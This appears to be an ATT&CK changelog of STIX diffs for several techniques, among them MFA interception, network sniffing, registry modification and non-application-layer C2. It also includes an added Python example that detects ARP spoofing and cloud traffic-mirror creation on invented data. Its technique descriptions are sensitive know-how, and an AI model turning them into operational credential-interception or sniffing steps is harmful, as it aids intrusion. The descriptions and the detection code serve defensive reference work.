x_mitre_data_sources[0]: Service: Service Creation → File: File Modification
x_mitre_data_sources[1]: Scheduled Job: Scheduled Job Metadata → Service: Service Creation
x_mitre_data_sources[2]: Scheduled Job: Scheduled Job Modification → Scheduled Job: Scheduled Job Metadata
x_mitre_data_sources[3]: Service: Service Metadata → Scheduled Job: Scheduled Job Modification
x_mitre_data_sources[4]: File: File Metadata → Process: Process Metadata
x_mitre_data_sources[7]: Process: Process Metadata → Service: Service Metadata
x_mitre_data_sources[8]: File: File Modification → File: File Metadata
x_mitre_version: 1.4 → 1.5
iterable_item_removed
STIX Field: Old value
external_references: {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/177.html', 'external_id': 'CAPEC-177'}

[T1556] Modify Authentication Process

Current version: 2.3

Version changed from: 2.2 → 2.3

New Mitigations:

New Detections:

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-18 16:28:56.126000+00:00 → 2023-04-11 03:17:32.211000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Windows Registry: Windows Registry Key Modification → Active Directory: Active Directory Object Modification
x_mitre_data_sources[2]: User Account: User Account Authentication → File: File Modification
x_mitre_data_sources[4]: File: File Creation → Application Log: Application Log Content
x_mitre_data_sources[5]: Logon Session: Logon Session Creation → Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]: File: File Modification → Process: OS API Execution
x_mitre_data_sources[7]: Application Log: Application Log Content → Process: Process Access
x_mitre_data_sources[8]: Process: OS API Execution → Logon Session: Logon Session Creation
x_mitre_data_sources[9]: Active Directory: Active Directory Object Modification → Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[10]: Process: Process Access → User Account: User Account Authentication
x_mitre_version: 2.2 → 2.3
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: File: File Creation

[T1112] Modify Registry

Current version: 1.3

Version changed from: 1.2 → 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
external_references: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
external_references: CAPEC-203
values_changed
STIX Field: Old value → New Value
modified: 2020-08-13 20:02:49.641000+00:00 → 2023-04-21 12:19:38.962000+00:00
external_references[1]['source_name']: capec → Microsoft Reg
external_references[1]['url']: https://capec.mitre.org/data/definitions/203.html → https://technet.microsoft.com/en-us/library/cc732643.aspx
external_references[2]['source_name']: Microsoft Reg → Microsoft Remote
external_references[2]['description']: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015. → Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.
external_references[2]['url']: https://technet.microsoft.com/en-us/library/cc732643.aspx → https://technet.microsoft.com/en-us/library/cc754820.aspx
external_references[3]['source_name']: Microsoft Reghide NOV 2006 → Microsoft 4657 APR 2017
external_references[3]['description']: Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018. → Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.
external_references[3]['url']: https://docs.microsoft.com/sysinternals/downloads/reghide → https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
external_references[4]['source_name']: TrendMicro POWELIKS AUG 2014 → SpectorOps Hiding Reg Jul 2017
external_references[4]['description']: Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018. → Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.
external_references[4]['url']: https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/ → https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
external_references[5]['source_name']: SpectorOps Hiding Reg Jul 2017 → Microsoft Reghide NOV 2006
external_references[5]['description']: Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018. → Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.
external_references[5]['url']: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 → https://docs.microsoft.com/sysinternals/downloads/reghide
external_references[6]['source_name']: Microsoft Remote → Microsoft RegDelNull July 2016
external_references[6]['description']: Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015. → Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.
external_references[6]['url']: https://technet.microsoft.com/en-us/library/cc754820.aspx → https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull
external_references[7]['source_name']: Microsoft 4657 APR 2017 → TrendMicro POWELIKS AUG 2014
external_references[7]['description']: Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018. → Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.
external_references[7]['url']: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657 → https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
x_mitre_data_sources[0]: Process: Process Creation → Windows Registry: Windows Registry Key Deletion
x_mitre_data_sources[5]: Process: OS API Execution → Process: Process Creation
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: Process: OS API Execution
iterable_item_removed
STIX Field: Old value
external_references: {'source_name': 'Microsoft RegDelNull July 2016', 'description': 'Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.', 'url': 'https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull'}
x_mitre_data_sources: Windows Registry: Windows Registry Key Deletion

[T1111] Multi-Factor Authentication Interception

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description:
Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)

New Description:
Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)

Dropped Mitigations:

Details
dictionary_item_removed
STIX Field: Old value
x_mitre_system_requirements: ['Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.\n\nOut-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.\n\nHardware token: Access to the seed and algorithm of generating one-time codes.']
values_changed
STIX Field: Old value → New Value
modified: 2022-10-31 19:47:26.104000+00:00 → 2023-04-14 23:26:24.262000+00:00
description:
Old value: Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)
New Value: Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)
external_references[3]['source_name']: Operation Emmental → Okta Scatter Swine 2022
external_references[3]['description']: Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016. → Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.
external_references[3]['url']: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf → https://sec.okta.com/scatterswine
x_mitre_attack_spec_version: 3.0.0 → 3.1.0
x_mitre_data_sources[0]: Process: OS API Execution → Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]: Windows Registry: Windows Registry Key Modification → Process: OS API Execution
x_mitre_version: 2.0 → 2.1

[T1070.005] Indicator Removal: Network Share Connection Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['Administrator', 'User']
values_changed
STIX Field: Old value → New Value
modified: 2021-02-09 13:31:01.970000+00:00 → 2023-04-13 17:15:56.948000+00:00
x_mitre_data_sources[0]: Process: Process Creation → User Account: User Account Authentication
x_mitre_data_sources[1]: Command: Command Execution → Process: Process Creation
x_mitre_data_sources[3]: User Account: User Account Authentication → Command: Command Execution
x_mitre_version: 1.0 → 1.1

[T1040] Network Sniffing

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description:
Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring)

New Description:
Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referencesSpencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-158
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:32:27.146000+00:002023-04-12 23:31:49.085000+00:00
descriptionAdversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. 
(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. 
For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
external_references[2]['source_name']GCP Packet Mirroringcapture_embedded_packet_on_software
external_references[2]['description']Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.
external_references[2]['url']https://cloud.google.com/vpc/docs/packet-mirroringhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html
external_references[3]['source_name']SpecterOps AWS Traffic MirroringGCP Packet Mirroring
external_references[3]['description']Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.
external_references[3]['url']https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512https://cloud.google.com/vpc/docs/packet-mirroring
external_references[4]['source_name']Azure Virtual Network TAPSpecterOps AWS Traffic Mirroring
external_references[4]['description']Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.
external_references[4]['url']https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overviewhttps://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512
external_references[5]['source_name']Rhino Security Labs AWS VPC Traffic MirroringAzure Virtual Network TAP
external_references[5]['description']Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.
external_references[5]['url'] | https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/ | https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview
external_references[6]['source_name'] | capec | Rhino Security Labs AWS VPC Traffic Mirroring
external_references[6]['url'] | https://capec.mitre.org/data/definitions/158.html | https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_detection | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. For network infrastructure devices, collect AAA logging to monitor for the capture of network traffic.
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New Value
external_references | (none) | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_contributors | (none) | Austin Clark, @c2defense
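
The x_mitre_detection text above names two concrete signals for Network Sniffing: ARP spoofing and repeated gratuitous ARP on the enclave network, and creation or modification of traffic mirrors in cloud environments. The following Python is an added example written for this changelog entry; it is not ATT&CK's code nor code from the cited sources. It runs both checks over constructed input: the ARP observations (timestamps, IPs, MACs) and the CloudTrail-style records (ARNs, source IPs) are invented for the example, while the EC2 action names in TRAFFIC_MIRROR_ACTIONS are the real eventName values CloudTrail records for VPC Traffic Mirroring.

```python
from collections import defaultdict

# Constructed ARP observations, invented for this example:
# (timestamp, sender_ip, sender_mac, target_ip, opcode); opcode 1 = request, 2 = reply.
ARP_EVENTS = [
    (1, "10.0.0.1", "aa:aa:aa:aa:aa:01", "10.0.0.50", 1),  # gateway asks who has .50
    (2, "10.0.0.50", "aa:aa:aa:aa:aa:50", "10.0.0.1", 2),  # .50 answers
    (3, "10.0.0.1", "aa:aa:aa:aa:aa:01", "10.0.0.1", 1),   # gratuitous ARP: sender == target
    (4, "10.0.0.1", "de:ad:be:ef:00:99", "10.0.0.50", 2),  # gateway IP now claims another MAC
    (5, "10.0.0.1", "de:ad:be:ef:00:99", "10.0.0.1", 2),   # second gratuitous ARP, new MAC
]


def analyze_arp(events, max_gratuitous_per_ip=1):
    """Flag IP-to-MAC changes and repeated gratuitous ARP, per sender IP.

    A host legitimately announces itself with a gratuitous ARP (sender IP ==
    target IP) once, at boot or on an address change. An IP that suddenly
    resolves to a different MAC, or that keeps re-announcing itself, is the
    footprint of ARP cache poisoning used to redirect traffic for sniffing.
    """
    ip_to_mac = {}
    gratuitous = defaultdict(int)
    alerts = []
    for ts, sender_ip, sender_mac, target_ip, _opcode in events:
        if sender_ip == target_ip:
            gratuitous[sender_ip] += 1
            if gratuitous[sender_ip] > max_gratuitous_per_ip:
                alerts.append((ts, "gratuitous-arp-repeat", sender_ip, sender_mac))
        known = ip_to_mac.get(sender_ip)
        if known is not None and known != sender_mac:
            alerts.append((ts, "ip-mac-change", sender_ip, f"{known}->{sender_mac}"))
        ip_to_mac[sender_ip] = sender_mac
    return alerts


# EC2 API actions that create or alter a VPC Traffic Mirror; these are the
# eventName values CloudTrail records for the Traffic Mirroring feature.
TRAFFIC_MIRROR_ACTIONS = {
    "CreateTrafficMirrorSession",
    "CreateTrafficMirrorTarget",
    "CreateTrafficMirrorFilter",
    "CreateTrafficMirrorFilterRule",
    "ModifyTrafficMirrorSession",
    "ModifyTrafficMirrorFilterRule",
    "ModifyTrafficMirrorFilterNetworkServices",
}

# Constructed CloudTrail-style records (a subset of fields), invented for this example.
CLOUDTRAIL_EVENTS = [
    {"eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops"},
     "sourceIPAddress": "203.0.113.5"},
    {"eventName": "CreateTrafficMirrorTarget",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/contractor"},
     "sourceIPAddress": "198.51.100.7"},
    {"eventName": "CreateTrafficMirrorSession",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/contractor"},
     "sourceIPAddress": "198.51.100.7"},
]


def traffic_mirror_changes(records):
    """Return (actor ARN, action, source IP) for every traffic-mirror create/modify call."""
    return [
        (r["userIdentity"]["arn"], r["eventName"], r["sourceIPAddress"])
        for r in records
        if r.get("eventName") in TRAFFIC_MIRROR_ACTIONS
    ]


if __name__ == "__main__":
    for alert in analyze_arp(ARP_EVENTS):
        print("ARP", alert)
    for change in traffic_mirror_changes(CLOUDTRAIL_EVENTS):
        print("CLOUD", change)
```

The ARP check keeps state per sender IP, so it must run over a continuous feed from one segment (a span port or a Zeek arp log) rather than isolated packets; the cloud check is stateless and belongs in whatever consumes CloudTrail, with the actor ARN compared against the short list of principals allowed to set up mirroring.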

[T1095] Non-Application Layer Protocol

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

New Description
Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | (none) | 3.1.0
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New Value
modified | 2022-02-17 15:38:54.578000+00:00 | 2023-04-20 19:11:53.499000+00:00
description | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
external_references[1]['source_name'] | Wikipedia OSI | University of Birmingham C2
external_references[1]['description'] | Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url'] | http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29 | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[5]['source_name'] | University of Birmingham C2 | Wikipedia OSI
external_references[5]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.
external_references[5]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29
x_mitre_version | 2.1 | 2.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | (none) | Duane Michael
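
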